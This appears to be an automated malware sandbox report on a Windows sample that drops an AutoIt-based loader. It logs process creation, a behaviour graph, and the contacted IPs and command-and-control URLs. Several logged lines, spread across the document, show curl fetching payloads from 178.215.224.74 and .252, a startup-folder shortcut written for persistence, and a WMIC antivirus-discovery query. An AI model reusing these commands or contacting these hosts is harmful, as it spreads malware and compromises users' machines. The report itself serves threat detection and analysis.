Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & echo url="c:\users\user\appdata\local\innosphere dynamics\innosphere.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\innosphere.url" & exit Jump to behavior
Source: Finish.com, 0000000A.00000003.2078982838.0000000003A70000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072228997.0000000000613000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231027932.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_0041713F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA, 52_2_00416AF5
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte, 52_2_0041BC50
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: EnumSystemLocalesA, 52_2_00417068
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: EnumSystemLocalesA, 52_2_00416CCA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_00411CF0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_0041709F
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_00411CB0
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA, 52_2_00416D51
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoW,WideCharToMultiByte, 52_2_0041BD13
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_004171C4
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_0041725C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: EnumSystemLocalesA, 52_2_00416F55
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar, 52_2_0041BB3D
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA,MultiByteToWideChar, 52_2_0041BBFA
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: GetLocaleInfoA, 52_2_00416FAB
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_00413F9E GetLocalTime,GetSystemTime,GetTimeZoneInformation, 52_2_00413F9E
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004194BD GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 52_2_004194BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561834 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 124 bg.microsoft.map.fastly.net 2->124 126 GyxNFpxuLvDE.GyxNFpxuLvDE 2->126 128 EaUMrTLEnhJoi.EaUMrTLEnhJoi 2->128 138 Suricata IDS alerts for network traffic 2->138 140 Antivirus detection for URL or domain 2->140 142 Sigma detected: Copy itself to suspicious location via type command 2->142 144 4 other signatures 2->144 11 file.exe 18 2->11         started        15 wscript.exe 2->15         started        signatures3 process4 file5 106 C:\Users\user\AppData\Local\Temp\Rocky, PE32 11->106 dropped 108 C:\Users\user\AppData\Local\Temp\Vermont, data 11->108 dropped 110 C:\Users\user\AppData\Local\Temp\Vatican, data 11->110 dropped 112 5 other malicious files 11->112 dropped 158 Writes many files with high entropy 11->158 17 cmd.exe 3 11->17         started        21 Conhost.exe 11->21         started        160 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->160 23 InnoSphere.scr 15->23         started        signatures6 process7 file8 84 C:\Users\user\AppData\Local\...\Finish.com, PE32 17->84 dropped 134 Drops PE files with a suspicious file extension 17->134 136 Writes many files with high entropy 17->136 25 Finish.com 23 17->25         started        29 cmd.exe 2 17->29         started        31 conhost.exe 17->31         started        33 8 other processes 17->33 signatures9 process10 file11 96 C:\Users\user\AppData\...\RevenueDevices.exe, PE32 25->96 dropped 98 C:\Users\user\AppData\...\InnoSphere.scr, PE32 25->98 dropped 100 C:\Users\user\AppData\Roaming\...\xhwq.zip, Zip 25->100 dropped 104 3 other files (2 malicious) 25->104 dropped 154 Drops PE files with a suspicious file extension 25->154 156 Writes many files with high entropy 25->156 35 RevenueDevices.exe 25->35         started        39 cmd.exe 25->39         started        41 cmd.exe 25->41         started        43 25 other processes 25->43 102 C:\Users\user\AppData\Local\Temp\768032behaviorgraph, data 29->102 dropped signatures12 process13 file14 86 C:\Users\user\AppData\Local\Temp\Showcase, data 35->86 dropped 88 C:\Users\user\AppData\Local\Temp\Shepherd, data 35->88 dropped 90 C:\Users\user\AppData\Local\Temp\Samples, data 35->90 dropped 94 5 other malicious files 35->94 dropped 146 Multi AV Scanner detection for dropped file 35->146 148 Writes many files with high entropy 35->148 45 cmd.exe 35->45         started        48 azvw.exe 39->48         started        50 conhost.exe 39->50         started        52 systeminfo.exe 41->52         started        62 2 other processes 41->62 92 C:\Users\user\AppData\...\InnoSphere.url, MS 43->92 dropped 55 curl.exe 43->55         started        58 curl.exe 43->58         started        60 curl.exe 43->60         started        64 47 other processes 43->64 signatures15 process16 dnsIp17 114 C:\Users\user\AppData\Local\...ither.pif, PE32 45->114 dropped 66 conhost.exe 45->66         started        116 C:\Users\user\AppData\...\PsInfo64.exe, PE32+ 48->116 dropped 118 C:\Users\user\AppData\Roaming\...\PsInfo.exe, PE32 48->118 dropped 120 C:\Users\user\AppData\Roaming\...\7zxa.dll, PE32 48->120 dropped 122 4 other files (2 malicious) 48->122 dropped 150 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 52->150 152 Writes or reads registry keys via WMI 52->152 68 WmiPrvSE.exe 52->68         started        78 2 other processes 52->78 130 178.215.224.74, 49793, 49798, 49800 LVLT-10753US Germany 55->130 70 Conhost.exe 58->70         started        72 Conhost.exe 58->72         started        80 2 other processes 60->80 74 Conhost.exe 62->74         started        132 178.215.224.252, 49732, 50023, 80 LVLT-10753US Germany 64->132 76 Conhost.exe 64->76         started        82 4 other processes 64->82 file18 signatures19 process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
178.215.224.252
 unknown Germany
10753 LVLT-10753US false
178.215.224.74
 unknown Germany
10753 LVLT-10753US true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.214.172 true
EaUMrTLEnhJoi.EaUMrTLEnhJoi unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?gi true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=8 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=7 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=6 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=5 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=31 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.252/v10/ukyh.php?jspo=6 false
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?uvyw=2 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?uvyw=6 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 true
  • Avira URL Cloud: malware
 unknown
http://178.215.224.74/v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 true
  • Avira URL Cloud: malware
 unknown